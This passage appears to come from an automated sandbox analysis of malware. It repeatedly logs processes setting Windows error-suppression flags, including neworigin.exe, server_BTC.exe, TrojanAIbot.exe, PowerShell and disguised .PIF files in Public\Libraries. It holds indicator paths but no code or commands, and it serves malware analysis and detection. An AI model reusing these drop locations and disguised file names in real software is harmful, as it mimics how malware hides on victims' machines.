                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeProcess information set: NOOPENFILEERRORBOX
